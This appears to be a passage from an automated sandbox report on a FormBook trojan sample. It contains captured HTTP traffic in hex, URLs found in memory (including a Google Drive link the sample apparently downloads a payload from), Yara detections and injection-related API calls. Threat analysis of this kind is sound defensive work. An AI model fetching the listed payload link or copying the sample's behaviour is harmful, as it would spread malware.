1f f3 0e 72 f9 9b 01 57 63 e0 09 18 73 65 f6 32 7d 89 47 2e 22 f9 16 d2 15 ee b3 cf e7 be c0 0d 74 1d 2d 7c 32 35 65 5d bf c2 8d 69 b3 ff 11 6d 17 86 70 62 5b d6 72 23 aa 8e e6 80 66 c3 20 a8 72 b1 fd 98 f1 47 4e 05 13 bf 71 67 af 01 ab fb 30 35 f3 4b 02 31 a2 7a 7d 58 22 71 b5 70 f9 f7 68 eb db de 8b d7 e1 cb 65 fa 66 37 fc f1 fe d1 9b 47 74 ed 5e b8 bf 4e 57 97 c3 f5 3f 4f 0e 1f d2 d7 af 7a 3b 7b e9 7d 8b 3a 3f 47 6b 2b f4 f1 46 af f3 2e ea 76 c2 07 bb e1 bd 3f 4e 0e 97 54 c1 fb 10 5d e6 6a 74 f5 45 ef 76 97 7e f7 94 6e ff 74 72 b8 35 48 c2 ec ae b3 56 46 54 1b c5 1d 84 ab 6b 47 6f 7f 61 7d d0 95 3b b4 f3 37 7d 78 87 ae ed d1 47 2f 8f 37 9f b3 60 f8 e4 80 de 3d 48 5b 54 05 56 91 a8 10 32 8c 21 39 31 e1 ee f2 51 77 bd f7 db 33 ba b2 ff bf 84 cf 6e 85 4f 7f 4d 39 53 c2 93 c3 ed 01 70 d2 13 83 49 e5 86 f7 37 98 62 b6 07 8c be b7 f4 24 da 3f 88 9e bf 3d fe e1 af b8 fa dd 36 5d 5f 39 53 1a 6e 76 8e 6f 6d a5 d5 bd ce 3f b4 b3 73 aa 3a 19 5a 83 4d 1c ae ee 2b 52 85 f4 04 b3 a7 2a a4 86 e8 fb 2b 07 06 3f 36 15 67 90 63 e0 26 c9 9b 4d 57 23 08 bb f9 42 6b 28 01 cc 41 1f 40 df af de 38 67 11 e2 29 82 20 8d 97 f9 d2 05 5e 1a 2f f1 b2 5c 16 1c 3e 1e b8 e7 c6 be aa 0c 55 cd 23 57 c7 f3 bc 8d 35 18 43 f2 96 6f 98 55 86 72 c3 8b 07 f1 15 97 e4 af 42 62 f1 3e 64 69 4e be 70 9e 7d e2 6d c3 6d 10 ab 7
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 04 Jun 2024 12:40:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cacheContent-Encoding: gzipData Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 5b 6f 13 47 14 7e 8e 7f c5 74 a3 0a 1b c5 7b b3 13 c2 7a 6d 89 a2 54 42 0d a2 52 53 f1 80 aa 6a bc 17 ef 90 dd 9d d5 ee 38 97 5a 96 48 28 01 04 34 41 25 6a 2e 95 68 43 9b 96 46 32 85 54 82 92 98 fe 99 cc ae f3 94 bf d0 d9 8b 8d 43 5a fb 61 77 ce 9e f3 7d e7 9b f9 e6 a8 1f e9 58 23 8b 9e 01 2c e2 d8 b5 9c da 7f 18 50 67 2b c7 20 10 68 16 f4 03 83 54 b9 26 31 8b 93 1c 0b 13 44 6c a3 16 75 1f 47 7b 9b c7 1b af a2 a5 3d ba b3 a9 0a 69 38 a7 06 64 91 7d ce 9d 6f 39 d0 6f 20 57 11 2b 1e d4 75 e4 36 d8 9b 86 6d ec 2b a3 e5 72 b9 9d ab 63 7d b1 65 62 97 14 03 f4 8d a1 48 65 6f a1 92 2c 4d e8 20 7b 51 e1 68 e7 c1 51 f7 7b ae 9d e3 1d 88 dc d6 3c d2 89 a5 4c 88 22 cb cb a0 25 f1 63 00 9b 04 57 58 4e 42 df aa 43 6d b6 e1 e3 a6 ab 2b 60 54 16 e1 78 09 66 a4 60 d4 34 cd 94 20 e1 03 d2 04 03 b2 0c d4 b0 88 02 ca 31 aa 8d 5c a3 78 2a 92 75 5e b4 0d 93 25 c9 71 12 a3 d2 58 97 86 4b 86 c8 8a 99 30 b3 64 5e 30 2f 56 40 06 22 4f c6 15 75 ec eb 86 af 48 de 02 d0 61 60 19 3a 18 d5 26 f4 8b f5 89 c1 c6 c4 c0 b1 04 a9 95 e6 16 eb 98 10 ec b0 1e cf d6 a4 4c b1 9a b2 28 8a a9 a0 f9 4c 45 1d db 7a 05 64 9b 03 44 f6 4f 5a 06 7d 19 03 d8 c9 54 08 91 b3 43 ea 13 c6 71 90 1c 42 06 19 23 b6 73 d8 1e 1c 66 86 09 64 99 a5 be 3f d8 38 07 d8 a8 35 bc 85 a5 44 95 2a 64 86 50 05 2b b5 55 a0 f9 c8 23 ef 8d f5 e5 cc a7 cc 58 00 e9 55 6e fa d2 d7 97 af 4d 4f 4f 5d 9e e1 40 e0 6b 55 4e 10 02 7d 96 1f 97 78 1b 0a 37 83 22 5b 14 3d 1f f3 0e 72 f9 9b 01 57 63 e0 09 18 73 65 f6 32 7d 89 47 2e 22 f9 16 d2 15 ee b3 cf e7 be c0 0d 74 1d 2d 7c 32 35 65 5d bf c2 8d 69 b3 ff 11 6d 17 86 70 62 5b d6 72 23 aa 8e e6 80 66 c3 20 a8 72 b1 fd 98 f1 47 4e 05 13 bf 71 67 af 01 ab fb 30 35 f3 4b 02 31 a2 7a 7d 58 22 71 b5 70 f9 f7 68 eb db de 8b d7 e1 cb 65 fa 66 37 fc f1 fe d1 9b 47 74 ed 5e b8 bf 4e 57 97 c3 f5 3f 4f 0e 1f d2 d7 af 7a 3b 7b e9 7d 8b 3a 3f 47 6b 2b f4 f1 46 af f3 2e ea 76 c2 07 bb e1 bd 3f 4e 0e 97 54 c1 fb 10 5d e6 6a 74 f5 45 ef 76 97 7e f7 94 6e ff 74 72 b8 35 48 c2 ec ae b3 56 46 54 1b c5 1d 84 ab 6b 47 6f 7f 61 7d d0 95 3b b4 f3 37 7d 78 87 ae ed d1 47 2f 8f 37 9f b3 60 f8 e4 80 de 3d 48 5b 54 05 56 91 a8 10 32 8c 21 39 31 e1 ee f2 51 77 bd f7 db 33 ba b2 ff bf 84 cf 6e 85 4f 7f 4d 39 53 c2 93 c3 ed 01 70 d2 13 83 49 e5 86 f7 37 98 62 b6 07 8c be b7 f4 24 da 3f 88 9e bf 3d fe e1 af b8 fa dd 36 5d 5f 39 53 1a 6e 76 8e 6f 6d a5 d5 bd ce 3f b4 b3 73 aa 3a 19 5a 83 4d 1c ae ee 2b 52 85 f4 04 b3 a7 2a a4 86 e8 fb 2b 07 06 3f 36 15 67 90 63 e0 26 c9 9b 4d 57 23 08 bb f9 42 6b 28 01 cc 41 1f 40 df af de 38 67 11 e2 29 82 20 8d 97 f9 d2 05 5e 1a 2f f1 b2 5c 16 1c 3e 1e b8 e7 c6 be aa 0c 55 cd 23 57 c7 f3 bc 8d 35 18 43 f2 96 6f 98 55 86 72 c3 8b 07 f1 15 97 e4 af 42 62 f1 3e 64 69 4e be 70 9e 7d e2 6d c3 6d 10 ab 7
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 04 Jun 2024 12:40:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cacheContent-Encoding: gzipData Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 5b 6f 13 47 14 7e 8e 7f c5 74 a3 0a 1b c5 7b b3 13 c2 7a 6d 89 a2 54 42 0d a2 52 53 f1 80 aa 6a bc 17 ef 90 dd 9d d5 ee 38 97 5a 96 48 28 01 04 34 41 25 6a 2e 95 68 43 9b 96 46 32 85 54 82 92 98 fe 99 cc ae f3 94 bf d0 d9 8b 8d 43 5a fb 61 77 ce 9e f3 7d e7 9b f9 e6 a8 1f e9 58 23 8b 9e 01 2c e2 d8 b5 9c da 7f 18 50 67 2b c7 20 10 68 16 f4 03 83 54 b9 26 31 8b 93 1c 0b 13 44 6c a3 16 75 1f 47 7b 9b c7 1b af a2 a5 3d ba b3 a9 0a 69 38 a7 06 64 91 7d ce 9d 6f 39 d0 6f 20 57 11 2b 1e d4 75 e4 36 d8 9b 86 6d ec 2b a3 e5 72 b9 9d ab 63 7d b1 65 62 97 14 03 f4 8d a1 48 65 6f a1 92 2c 4d e8 20 7b 51 e1 68 e7 c1 51 f7 7b ae 9d e3 1d 88 dc d6 3c d2 89 a5 4c 88 22 cb cb a0 25 f1 63 00 9b 04 57 58 4e 42 df aa 43 6d b6 e1 e3 a6 ab 2b 60 54 16 e1 78 09 66 a4 60 d4 34 cd 94 20 e1 03 d2 04 03 b2 0c d4 b0 88 02 ca 31 aa 8d 5c a3 78 2a 92 75 5e b4 0d 93 25 c9 71 12 a3 d2 58 97 86 4b 86 c8 8a 99 30 b3 64 5e 30 2f 56 40 06 22 4f c6 15 75 ec eb 86 af 48 de 02 d0 61 60 19 3a 18 d5 26 f4 8b f5 89 c1 c6 c4 c0 b1 04 a9 95 e6 16 eb 98 10 ec b0 1e cf d6 a4 4c b1 9a b2 28 8a a9 a0 f9 4c 45 1d db 7a 05 64 9b 03 44 f6 4f 5a 06 7d 19 03 d8 c9 54 08 91 b3 43 ea 13 c6 71 90 1c 42 06 19 23 b6 73 d8 1e 1c 66 86 09 64 99 a5 be 3f d8 38 07 d8 a8 35 bc 85 a5 44 95 2a 64 86 50 05 2b b5 55 a0 f9 c8 23 ef 8d f5 e5 cc a7 cc 58 00 e9 55 6e fa d2 d7 97 af 4d 4f 4f 5d 9e e1 40 e0 6b 55 4e 10 02 7d 96 1f 97 78 1b 0a 37 83 22 5b 14 3d 1f f3 0e 72 f9 9b 01 57 63 e0 09 18 73 65 f6 32 7d 89 47 2e 22 f9 16 d2 15 ee b3 cf e7 be c0 0d 74 1d 2d 7c 32 35 65 5d bf c2 8d 69 b3 ff 11 6d 17 86 70 62 5b d6 72 23 aa 8e e6 80 66 c3 20 a8 72 b1 fd 98 f1 47 4e 05 13 bf 71 67 af 01 ab fb 30 35 f3 4b 02 31 a2 7a 7d 58 22 71 b5 70 f9 f7 68 eb db de 8b d7 e1 cb 65 fa 66 37 fc f1 fe d1 9b 47 74 ed 5e b8 bf 4e 57 97 c3 f5 3f 4f 0e 1f d2 d7 af 7a 3b 7b e9 7d 8b 3a 3f 47 6b 2b f4 f1 46 af f3 2e ea 76 c2 07 bb e1 bd 3f 4e 0e 97 54 c1 fb 10 5d e6 6a 74 f5 45 ef 76 97 7e f7 94 6e ff 74 72 b8 35 48 c2 ec ae b3 56 46 54 1b c5 1d 84 ab 6b 47 6f 7f 61 7d d0 95 3b b4 f3 37 7d 78 87 ae ed d1 47 2f 8f 37 9f b3 60 f8 e4 80 de 3d 48 5b 54 05 56 91 a8 10 32 8c 21 39 31 e1 ee f2 51 77 bd f7 db 33 ba b2 ff bf 84 cf 6e 85 4f 7f 4d 39 53 c2 93 c3 ed 01 70 d2 13 83 49 e5 86 f7 37 98 62 b6 07 8c be b7 f4 24 da 3f 88 9e bf 3d fe e1 af b8 fa dd 36 5d 5f 39 53 1a 6e 76 8e 6f 6d a5 d5 bd ce 3f b4 b3 73 aa 3a 19 5a 83 4d 1c ae ee 2b 52 85 f4 04 b3 a7 2a a4 86 e8 fb 2b 07 06 3f 36 15 67 90 63 e0 26 c9 9b 4d 57 23 08 bb f9 42 6b 28 01 cc 41 1f 40 df af de 38 67 11 e2 29 82 20 8d 97 f9 d2 05 5e 1a 2f f1 b2 5c 16 1c 3e 1e b8 e7 c6 be aa 0c 55 cd 23 57 c7 f3 bc 8d 35 18 43 f2 96 6f 98 55 86 72 c3 8b 07 f1 15 97 e4 af 42 62 f1 3e 64 69 4e be 70 9e 7d e2 6d c3 6d 10 ab 7
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 04 Jun 2024 12:40:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cacheData Raw: 35 66 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 23 34 34 34 7d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 e5 ae 8b e4 bd 93 22 7d 0a 2e 6d 61 69 6e 7b 77 69 64 74 68 3a 36 30 30 70 78 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b 7d 0a 2e 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 30 61 35 33 61 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 68 65 69 67 68 74 3a 20 34 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 34 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 7d 0a 2e 63 6f 6e 74 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 33 66 37 66 39 3b 20 68 65 69 67 68 74 3a 32 38 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 64 61 73 68 65 64 20 23 63 36 64 39 62 36 3b 70 61 64 64 69 6e 67 3a 32 30 70 78 7d 0a 2e 74 31 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 64 61 73 68 65 64 20 23 63 36 64 39 62 36 3b 63 6f 6c 6f 72 3a 20 23 66 66 34 30 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 38 70 78 3b 7d 0a 2e 74 32 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 0a 6f 6c 7b 6d 61 72 67 69 6e 3a 30 20 30 20 32 30 70 78 20 32 32 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 7d 0a 6f 6c 20 6c 69 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 50 76 53 6f 67 69 57 69 78 42 45 45 68 57 49 22 2c 63 6b 3a 22 4b 50 76 53 6f 67 69 57 69 78 42 45 45 68 57 49 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 31 22 3e e6 82 a8 e7 9a 84 e8 af b7 e6 b1 82 e5 b8 a6 e6 9c 89 e4 b8 8d e5 90 88 e6 b3 95 e5 8
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Jun 2024 12:41:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: ulACwpUCSU.exe, 00000003.00000003.2865880154.000000000756F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: ulACwpUCSU.exe, 00000003.00000003.2865880154.000000000756F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: ulACwpUCSU.exe, ulACwpUCSU.exe, 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp, ulACwpUCSU.exe, 00000000.00000000.2283075526.0000000000409000.00000008.00000001.01000000.00000003.sdmp, ulACwpUCSU.exe, 00000003.00000000.2705727166.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: ulACwpUCSU.exe, 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp, ulACwpUCSU.exe, 00000000.00000000.2283075526.0000000000409000.00000008.00000001.01000000.00000003.sdmp, ulACwpUCSU.exe, 00000003.00000000.2705727166.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000626000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: ulACwpUCSU.exe, 00000003.00000001.2708155716.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: ulACwpUCSU.exe, 00000003.00000001.2708155716.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: ulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2865688162.0000000007560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: ulACwpUCSU.exe, 00000003.00000003.2920946844.0000000007558000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17gm-wgqB94fKwcr7ZsHzQiLhRxM6222H&export=download
        Source: ulACwpUCSU.exe, 00000003.00000003.2920593737.0000000007550000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000002.3032516537.0000000007552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17gm-wgqB94fKwcr7ZsHzQiLhRxM6222H&export=download5
        Source: ulACwpUCSU.exe, 00000003.00000003.2920946844.0000000007558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17gm-wgqB94fKwcr7ZsHzQiLhRxM6222H&export=download:
        Source: ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: ulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2865688162.0000000007560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: runonce.exeString found in binary or memory: https://www.gandi.net/en/domain
        Source: ulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2865688162.0000000007560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: ulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2865688162.0000000007560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: ulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2865688162.0000000007560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: ulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2865688162.0000000007560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownHTTPS traffic detected: 142.250.217.174:443 -> 192.168.11.30:49792 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.217.193:443 -> 192.168.11.30:49793 version: TLS 1.2
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_0040515D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040515D

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.3044504432.00000000373A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7373930298.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.7373346387.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.3044504432.00000000373A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.7373930298.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.7373346387.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377334E0 NtCreateMutant,LdrInitializeThunk,3_2_377334E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_37732D10
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_37732B90
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37734570 NtSuspendThread,3_2_37734570
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37734260 NtSetContextThread,3_2_37734260
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732F30 NtOpenDirectoryObject,3_2_37732F30
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732F00 NtCreateFile,3_2_37732F00
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732FB0 NtSetValueKey,3_2_37732FB0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732E50 NtCreateSection,3_2_37732E50
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732E00 NtQueueApcThread,3_2_37732E00
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732ED0 NtResumeThread,3_2_37732ED0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732EC0 NtQuerySection,3_2_37732EC0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732EB0 NtProtectVirtualMemory,3_2_37732EB0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732E80 NtCreateProcessEx,3_2_37732E80
